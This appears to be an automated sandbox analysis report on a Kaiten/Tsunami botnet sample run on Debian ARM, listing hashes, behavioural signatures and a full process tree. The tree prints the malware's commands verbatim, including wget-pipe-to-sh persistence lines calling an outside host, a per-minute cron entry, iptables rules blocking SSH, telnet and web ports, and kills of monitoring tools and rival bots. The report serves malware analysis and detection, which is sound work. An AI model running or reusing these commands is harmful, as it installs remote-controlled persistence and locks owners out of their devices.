Analysis
-
max time kernel
152s -
max time network
155s -
platform
debian-9_armhf -
resource
debian9-armhf-20231215-en -
resource tags
arch:armhfimage:debian9-armhf-20231215-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
22-12-2023 14:44
Static task
static1
Behavioral task
behavioral1
Sample
c97f99cdafcef0ac7b484e79ca7ed503
Resource
debian9-armhf-20231215-en
General
-
Target
c97f99cdafcef0ac7b484e79ca7ed503
-
Size
42KB
-
MD5
c97f99cdafcef0ac7b484e79ca7ed503
-
SHA1
45fcb4347629b373ec5766b68a9a9e0b8773eacc
-
SHA256
77b5f8dd7a6a31946a179206722acfb7d901d4be57525111dc7268538cc5fc81
-
SHA512
27c767a1d48031c9fd5e8f264edf6b72e1a0e1ec1133cdad8765435859f9ccac0f46256752fe1ab0688ddc8881a608273b23e4c721f4be081293502501017ae7
-
SSDEEP
768:2isrNjEjCMBdv3SfD/IwYlpxijZMhhie5FQWrSToy6XDo3UFAq2qQEpz+n:nrzBdviTIwYlAS75FQwyeMoz2
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/676-1-0x00008000-0x00029e3c-memory.dmp family_kaiten2 -
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.dBx0v1 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Enumerates kernel/hardware configuration 1 TTPs 45 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctldescription ioc process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
killallkillallkillallkillallkillallkillallsystemctlkillallkillallkillallkillallsystemctlkillallkillallsystemctlkillallkillallkillallsystemctlkillallkillallsystemctlkillalldescription ioc process File opened for reading /proc/746/stat killall File opened for reading /proc/41/stat killall File opened for reading /proc/656/stat killall File opened for reading /proc/107/stat killall File opened for reading /proc/614/stat killall File opened for reading /proc/22/stat killall File opened for reading /proc/43/stat killall File opened for reading /proc/cmdline systemctl File opened for reading /proc/4/stat killall File opened for reading /proc/6/stat killall File opened for reading /proc/297/stat killall File opened for reading /proc/227/stat killall File opened for reading /proc/525/stat killall File opened for reading /proc/779/stat killall File opened for reading /proc/24/stat killall File opened for reading /proc/cmdline systemctl File opened for reading /proc/14/stat killall File opened for reading /proc/27/stat killall File opened for reading /proc/108/stat killall File opened for reading /proc/575/stat killall File opened for reading /proc/28/stat killall File opened for reading /proc/28/stat killall File opened for reading /proc/17/stat killall File opened for reading /proc/821/stat killall File opened for reading /proc/filesystems systemctl File opened for reading /proc/332/stat killall File opened for reading /proc/689/stat killall File opened for reading /proc/653/cmdline killall File opened for reading /proc/19/stat killall File opened for reading /proc/658/stat killall File opened for reading /proc/108/stat killall File opened for reading /proc/16/stat killall File opened for reading /proc/18/stat killall File opened for reading /proc/107/stat killall File opened for reading /proc/697/stat killall File opened for reading /proc/726/stat killall File opened for reading /proc/779/stat killall File opened for reading /proc/653/stat killall File opened for reading /proc/self/stat systemctl File opened for reading /proc/726/stat killall File opened for reading /proc/614/stat killall File opened for reading /proc/297/stat killall File opened for reading /proc/6/stat killall File opened for reading /proc/824/stat killall File opened for reading /proc/4/stat killall File opened for reading /proc/322/stat killall File opened for reading /proc/658/stat killall File opened for reading /proc/614/stat killall File opened for reading /proc/filesystems systemctl File opened for reading /proc/141/stat killall File opened for reading /proc/29/stat killall File opened for reading /proc/614/stat killall File opened for reading /proc/6/stat killall File opened for reading /proc/23/stat killall File opened for reading /proc/13/stat killall File opened for reading /proc/679/stat killall File opened for reading /proc/676/stat killall File opened for reading /proc/20/stat killall File opened for reading /proc/24/stat killall File opened for reading /proc/282/stat killall File opened for reading /proc/653/cmdline killall File opened for reading /proc/14/stat killall File opened for reading /proc/654/cmdline killall File opened for reading /proc/654/stat killall -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
c97f99cdafcef0ac7b484e79ca7ed503description ioc process File opened for modification /tmp/udevd0.pid c97f99cdafcef0ac7b484e79ca7ed503
Processes
-
/tmp/c97f99cdafcef0ac7b484e79ca7ed503/tmp/c97f99cdafcef0ac7b484e79ca7ed5031⤵
- Writes file to tmp directory
PID:676 -
/bin/shsh -c "killall -9 tcpdump > /dev/null 2>&1 &"2⤵PID:678
-
-
/bin/shsh -c "killall -9 strace > /dev/null 2>&1 &"2⤵PID:685
-
-
/bin/shsh -c "nvram set rc_firewall=\"sleep 120 && wget -qO - http://y.fd6fq54s6df541q23sdxfg.eu/nvr | sh\" > /dev/null 2>&1 "2⤵PID:687
-
-
/bin/shsh -c "nvram commit > /dev/null 2>&1"2⤵PID:689
-
-
/bin/shsh -c "( echo \"sleep 120 && wget -q -O - http://y.fd6fq54s6df541q23sdxfg.eu/nvr | sh > /dev/null 2>&1 &\" > /etc/persistent/rc.poststart ) > /dev/null 2>&1"2⤵PID:690
-
-
/bin/shsh -c "chmod 755 /etc/persistent/rc.poststart > /dev/null 2>&1 "2⤵PID:693
-
/bin/chmodchmod 755 /etc/persistent/rc.poststart3⤵PID:694
-
-
-
/bin/shsh -c "cfgmtd -w -p /etc/ > /dev/null 2>&1 "2⤵PID:696
-
-
/bin/shsh -c "( cfgmtd -w -p /etc/ && sleep 432000 && reboot & ) > /dev/null 2>&1"2⤵PID:698
-
-
/bin/shsh -c "( cat /mnt/Config/S1_01timezone | grep -v derpcity | grep -v wireless > /var/run/.x00 ) > /dev/null 2>&1"2⤵PID:701
-
-
/bin/shsh -c "( echo \"sleep 120 && wget -qO - http://y.fd6fq54s6df541q23sdxfg.eu/nvr | sh > /dev/null 2>&1 &\" >> /var/run/.x00 ) > /dev/null 2>&1"2⤵PID:707
-
-
/bin/shsh -c "( cat /var/run/.x00 > /mnt/Config/S1_01timezone )> /dev/null 2>&1"2⤵PID:709
-
-
/bin/shsh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"2⤵PID:711
-
-
/bin/shsh -c "rm -rf /tmp/pty > /dev/null 2>&1 &"2⤵PID:713
-
-
/bin/shsh -c "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"2⤵PID:715
-
-
/bin/shsh -c "killall -9 telnetd > /dev/null 2>&1 &"2⤵PID:717
-
-
/bin/shsh -c "service httpd stop > /dev/null 2>&1 &"2⤵PID:720
-
-
/bin/shsh -c "service telnetd stop > /dev/null 2>&1 &"2⤵PID:722
-
-
/bin/shsh -c "service sshd stop > /dev/null 2>&1 &"2⤵PID:724
-
-
/bin/shsh -c "killall -9 telnetd > /dev/null 2>&1 &"2⤵PID:727
-
-
/bin/shsh -c "killall -9 utelnetd > /dev/null 2>&1 &"2⤵PID:731
-
-
/bin/shsh -c "killall -9 dropbear > /dev/null 2>&1 &"2⤵PID:735
-
-
/bin/shsh -c "killall -9 sshd > /dev/null 2>&1 &"2⤵PID:739
-
-
/bin/shsh -c "killall -9 minihttpd > /dev/null 2>&1 &"2⤵PID:742
-
-
/bin/shsh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"2⤵PID:745
-
-
/bin/shsh -c "nvram set httpd_enable=0 > /dev/null 2>&1"2⤵PID:750
-
-
/bin/shsh -c "nvram set http_enable=0 > /dev/null 2>&1"2⤵PID:757
-
-
/bin/shsh -c "killall -9 httpd > /dev/null 2>&1 &"2⤵PID:761
-
-
/bin/shsh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"2⤵PID:763
-
-
/bin/shsh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"2⤵PID:765
-
-
/bin/shsh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"2⤵PID:768
-
-
/bin/shsh -c "rm -rf /var/run/tty0 > /dev/null 2>&1 &"2⤵PID:771
-
-
/bin/shsh -c "rm -rf /var/run/tty1 > /dev/null 2>&1 &"2⤵PID:773
-
-
/bin/shsh -c "rm -rf /var/run/tty2 > /dev/null 2>&1 &"2⤵PID:777
-
-
/bin/shsh -c "rm -rf /var/run/tty3 > /dev/null 2>&1 &"2⤵PID:782
-
-
/bin/shsh -c "rm -rf /var/run/tty4 > /dev/null 2>&1 &"2⤵PID:785
-
-
/bin/shsh -c "rm -rf /var/run/tty6 > /dev/null 2>&1 &"2⤵PID:787
-
-
/bin/shsh -c "rm -rf /tmp/tty0 > /dev/null 2>&1 &"2⤵PID:789
-
-
/bin/shsh -c "rm -rf /tmp/tty1 > /dev/null 2>&1 &"2⤵PID:791
-
-
/bin/shsh -c "rm -rf /tmp/tty2 > /dev/null 2>&1 &"2⤵PID:794
-
-
/bin/shsh -c "rm -rf /tmp/tty3 > /dev/null 2>&1 &"2⤵PID:797
-
-
/bin/shsh -c "rm -rf /tmp/tty4 > /dev/null 2>&1 &"2⤵PID:800
-
-
/bin/shsh -c "rm -rf /tmp/tty6 > /dev/null 2>&1 &"2⤵PID:804
-
-
/bin/shsh -c "killall -9 arm > /dev/null 2>&1 &"2⤵PID:807
-
-
/bin/shsh -c "killall -9 mips > /dev/null 2>&1 &"2⤵PID:810
-
-
/bin/shsh -c "killall -9 mipsel > /dev/null 2>&1 &"2⤵PID:813
-
-
/bin/shsh -c "killall -9 powerpc > /dev/null 2>&1 &"2⤵PID:815
-
-
/bin/shsh -c "killall -9 ppc > /dev/null 2>&1 &"2⤵PID:819
-
-
/bin/shsh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"2⤵PID:821
-
-
/bin/shsh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"2⤵PID:823
-
-
/bin/shsh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"2⤵PID:827
-
-
/bin/shsh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"2⤵PID:830
-
-
/bin/shsh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"2⤵PID:833
-
-
/bin/shsh -c "iptables -A INPUT -p tcp --dport 22 -j DROP > /dev/null 2>&1 &"2⤵PID:835
-
-
/bin/shsh -c "iptables -A INPUT -p tcp --dport 23 -j DROP > /dev/null 2>&1 &"2⤵PID:837
-
-
/bin/shsh -c "iptables -A INPUT -p tcp --dport 80 -j DROP > /dev/null 2>&1 &"2⤵PID:841
-
-
/bin/shsh -c "iptables -A INPUT -p tcp --dport 8080 -j DROP > /dev/null 2>&1 &"2⤵PID:843
-
-
/bin/shsh -c "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"2⤵PID:846
-
-
/bin/shsh -c "chmod 700 /tmp/c97f99cdafcef0ac7b484e79ca7ed503 > /dev/null 2>&1 &"2⤵PID:853
-
-
/bin/shsh -c "touch -acmr /bin/ls /tmp/c97f99cdafcef0ac7b484e79ca7ed503"2⤵PID:857
-
/usr/bin/touchtouch -acmr /bin/ls /tmp/c97f99cdafcef0ac7b484e79ca7ed5033⤵PID:858
-
-
-
/bin/shsh -c "(crontab -l | grep -v \"/tmp/c97f99cdafcef0ac7b484e79ca7ed503\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"2⤵PID:859
-
-
/bin/shsh -c "echo \"* * * * * /tmp/c97f99cdafcef0ac7b484e79ca7ed503 > /dev/null 2>&1 &\" >> /var/run/.x001804289383"2⤵PID:869
-
-
/bin/shsh -c "crontab /var/run/.x001804289383"2⤵PID:874
-
/usr/bin/crontabcrontab /var/run/.x0018042893833⤵
- Creates/modifies Cron job
PID:877
-
-
-
/bin/shsh -c "rm -rf /var/run/.x001804289383"2⤵PID:879
-
/bin/rmrm -rf /var/run/.x0018042893833⤵PID:882
-
-
-
/usr/bin/killallkillall -9 tcpdump1⤵
- Reads runtime system information
PID:682
-
/usr/bin/killallkillall -9 strace1⤵
- Reads runtime system information
PID:686
-
/bin/catcat /mnt/Config/S1_01timezone1⤵PID:703
-
/bin/grepgrep -v derpcity1⤵PID:704
-
/bin/grepgrep -v wireless1⤵PID:705
-
/bin/rmrm -rf /var/run/pty1⤵PID:712
-
/bin/rmrm -rf /tmp/pty1⤵PID:714
-
/usr/bin/killallkillall -9 telnetd1⤵
- Reads runtime system information
PID:719
-
/usr/sbin/serviceservice httpd stop1⤵PID:721
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:725
-
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:729
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target2⤵
- Enumerates kernel/hardware configuration
PID:736
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket2⤵
- Enumerates kernel/hardware configuration
PID:769
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket2⤵
- Enumerates kernel/hardware configuration
PID:784
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket2⤵
- Enumerates kernel/hardware configuration
PID:798
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket2⤵
- Enumerates kernel/hardware configuration
PID:811
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket2⤵
- Enumerates kernel/hardware configuration
PID:825
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket2⤵
- Enumerates kernel/hardware configuration
PID:832
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket2⤵
- Enumerates kernel/hardware configuration
PID:850
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket2⤵
- Enumerates kernel/hardware configuration
PID:860
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket2⤵
- Enumerates kernel/hardware configuration
PID:876
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket2⤵
- Enumerates kernel/hardware configuration
PID:883
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket2⤵
- Enumerates kernel/hardware configuration
PID:893
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket2⤵
- Enumerates kernel/hardware configuration
PID:898
-
-
/usr/sbin/serviceservice telnetd stop1⤵PID:723
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:728
-
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:733
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:740
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket2⤵
- Enumerates kernel/hardware configuration
PID:775
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket2⤵
- Enumerates kernel/hardware configuration
PID:792
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket2⤵
- Enumerates kernel/hardware configuration
PID:806
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:816
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket2⤵
- Enumerates kernel/hardware configuration
PID:824
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket2⤵
- Enumerates kernel/hardware configuration
PID:838
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket2⤵
- Enumerates kernel/hardware configuration
PID:856
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:867
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket2⤵
- Enumerates kernel/hardware configuration
PID:878
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket2⤵
- Enumerates kernel/hardware configuration
PID:888
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket2⤵
- Enumerates kernel/hardware configuration
PID:895
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket2⤵
- Enumerates kernel/hardware configuration
PID:899
-
-
/usr/sbin/serviceservice sshd stop1⤵PID:726
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:732
-
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:738
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target2⤵
- Enumerates kernel/hardware configuration
PID:743
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:781
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket2⤵
- Enumerates kernel/hardware configuration
PID:795
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket2⤵
- Enumerates kernel/hardware configuration
PID:808
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket2⤵
- Enumerates kernel/hardware configuration
PID:818
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket2⤵
- Enumerates kernel/hardware configuration
PID:829
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket2⤵
- Enumerates kernel/hardware configuration
PID:839
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket2⤵
- Enumerates kernel/hardware configuration
PID:854
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket2⤵
- Enumerates kernel/hardware configuration
PID:861
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket2⤵
- Enumerates kernel/hardware configuration
PID:875
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket2⤵
- Enumerates kernel/hardware configuration
PID:881
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket2⤵
- Enumerates kernel/hardware configuration
PID:892
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket2⤵
- Enumerates kernel/hardware configuration
PID:896
-
-
/usr/bin/killallkillall -9 telnetd1⤵
- Reads runtime system information
PID:730
-
/usr/bin/killallkillall -9 utelnetd1⤵
- Reads runtime system information
PID:734
-
/usr/bin/killallkillall -9 dropbear1⤵
- Reads runtime system information
PID:737
-
/usr/bin/killallkillall -9 sshd1⤵
- Reads runtime system information
PID:741
-
/usr/bin/killallkillall -9 minihttpd1⤵
- Reads runtime system information
PID:744
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:748
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵PID:749
-
/bin/catcat /var/run/thttpd.pid1⤵PID:751
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
- Enumerates kernel/hardware configuration
PID:754
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵PID:756
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
- Enumerates kernel/hardware configuration
PID:759
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵PID:760
-
/usr/bin/killallkillall -9 httpd1⤵
- Reads runtime system information
PID:762
-
/bin/catcat /var/run/httpd.pid1⤵PID:766
-
/bin/rmrm -rf /var/run/wgsh1⤵PID:767
-
/bin/rmrm -rf /var/run/bbsh1⤵PID:770
-
/bin/rmrm -rf /var/run/tty01⤵PID:772
-
/bin/rmrm -rf /var/run/tty11⤵PID:776
-
/bin/rmrm -rf /var/run/tty21⤵PID:780
-
/bin/rmrm -rf /var/run/tty31⤵PID:783
-
/bin/rmrm -rf /var/run/tty41⤵PID:786
-
/bin/rmrm -rf /var/run/tty61⤵PID:788
-
/bin/rmrm -rf /tmp/tty01⤵PID:790
-
/bin/rmrm -rf /tmp/tty11⤵PID:793
-
/bin/rmrm -rf /tmp/tty21⤵PID:796
-
/bin/rmrm -rf /tmp/tty31⤵PID:799
-
/bin/rmrm -rf /tmp/tty41⤵PID:803
-
/bin/rmrm -rf /tmp/tty61⤵PID:805
-
/usr/bin/killallkillall -9 arm1⤵
- Reads runtime system information
PID:809
-
/usr/bin/killallkillall -9 mips1⤵
- Reads runtime system information
PID:812
-
/usr/bin/killallkillall -9 mipsel1⤵
- Reads runtime system information
PID:814
-
/usr/bin/killallkillall -9 powerpc1⤵
- Reads runtime system information
PID:817
-
/usr/bin/killallkillall -9 ppc1⤵
- Reads runtime system information
PID:820
-
/usr/bin/killallkillall -9 daemon.armv4l.mod1⤵
- Reads runtime system information
PID:822
-
/usr/bin/killallkillall -9 daemon.i686.mod1⤵
- Reads runtime system information
PID:826
-
/usr/bin/killallkillall -9 daemon.mips.mod1⤵
- Reads runtime system information
PID:828
-
/usr/bin/killallkillall -9 daemon.mipsel.mod1⤵
- Reads runtime system information
PID:831
-
/bin/rmrm -rf "/tmp/.xs/*"1⤵PID:834
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 22 -j DROP1⤵PID:836
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 23 -j DROP1⤵PID:840
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 80 -j DROP1⤵PID:842
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 8080 -j DROP1⤵PID:844
-
/bin/chmodchmod 700 /tmp/c97f99cdafcef0ac7b484e79ca7ed5031⤵PID:855
-
/usr/bin/crontabcrontab -l1⤵PID:863
-
/bin/grepgrep -v /tmp/c97f99cdafcef0ac7b484e79ca7ed5031⤵PID:864
-
/bin/grepgrep -v "no cron"1⤵PID:865
-
/bin/grepgrep -v lesshts/run.sh1⤵PID:866
-
/bin/shsh -c "/bin/uname -n"1⤵PID:885
-
/bin/uname/bin/uname -n2⤵PID:887
-
-
/bin/shsh -c "/bin/uname -n"1⤵PID:889
-
/bin/uname/bin/uname -n2⤵PID:891
-
-
/usr/local/sbin/systemctlsystemctl stop sshd.service1⤵PID:726
-
/usr/local/bin/systemctlsystemctl stop sshd.service1⤵PID:726
-
/usr/sbin/systemctlsystemctl stop sshd.service1⤵PID:726
-
/usr/bin/systemctlsystemctl stop sshd.service1⤵PID:726
-
/sbin/systemctlsystemctl stop sshd.service1⤵PID:726
-
/bin/systemctlsystemctl stop sshd.service1⤵
- Enumerates kernel/hardware configuration
PID:726
-
/usr/local/sbin/systemctlsystemctl stop httpd.service1⤵PID:721
-
/usr/local/bin/systemctlsystemctl stop httpd.service1⤵PID:721
-
/usr/sbin/systemctlsystemctl stop httpd.service1⤵PID:721
-
/usr/bin/systemctlsystemctl stop httpd.service1⤵PID:721
-
/sbin/systemctlsystemctl stop httpd.service1⤵PID:721
-
/bin/systemctlsystemctl stop httpd.service1⤵
- Enumerates kernel/hardware configuration
PID:721
-
/usr/local/sbin/systemctlsystemctl stop telnetd.service1⤵PID:723
-
/usr/local/bin/systemctlsystemctl stop telnetd.service1⤵PID:723
-
/usr/sbin/systemctlsystemctl stop telnetd.service1⤵PID:723
-
/usr/bin/systemctlsystemctl stop telnetd.service1⤵PID:723
-
/sbin/systemctlsystemctl stop telnetd.service1⤵PID:723
-
/bin/systemctlsystemctl stop telnetd.service1⤵
- Enumerates kernel/hardware configuration
PID:723
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
87B
MD5e9edd49b68669411a5e0ee7edbeb022a
SHA183dac91e569f69ea4a4325b7fb979721bb13f07d
SHA256cbf58a1d936bfb8a4c4f272f96c57f67ae5c8a0dfc56e17e8117ac8a12fba892
SHA512da53b5620ccbffd257db206836844bb7fdf3202a852009b459f672b9ccbc7e91c0fc58dcf98410ef2a7b21e9f9655a33bd9439cb1fdb8114d925cb9b674e30c2
-
Filesize
67B
MD5a48b9316c65dd939802bd37b26117914
SHA1591ec4b219281181613637e077758953104c0420
SHA2567448b6f27b771f36db613e5ea0dea0a227d999b245204870a65db9ac479bc7ae
SHA512078f5a961f19df6030917120ef7586e6be9657ed40cb6f9c3593d8df593ccd23029cdaab30b207dc76e1d87872f7d8bc266cbc449d9174ae894ff9c40cb34e5a
-
Filesize
264B
MD510ea31e4f50e74c49317510990441cad
SHA102f54636a1409d30eeb5f8927b77c9c4fda5a48d
SHA256af89f425cacf0c8bb01079dc745410109eca57e041f7c2fcf56f458283d91c72
SHA5125ffb8222a016e1a932a0c5b28d5cc9881ba5648c82f414d5ad40dfa9940fbd035fd02136acc2dba2a824bf5a6bf8da38a9420af5e1d3e038eb8d376df036b46b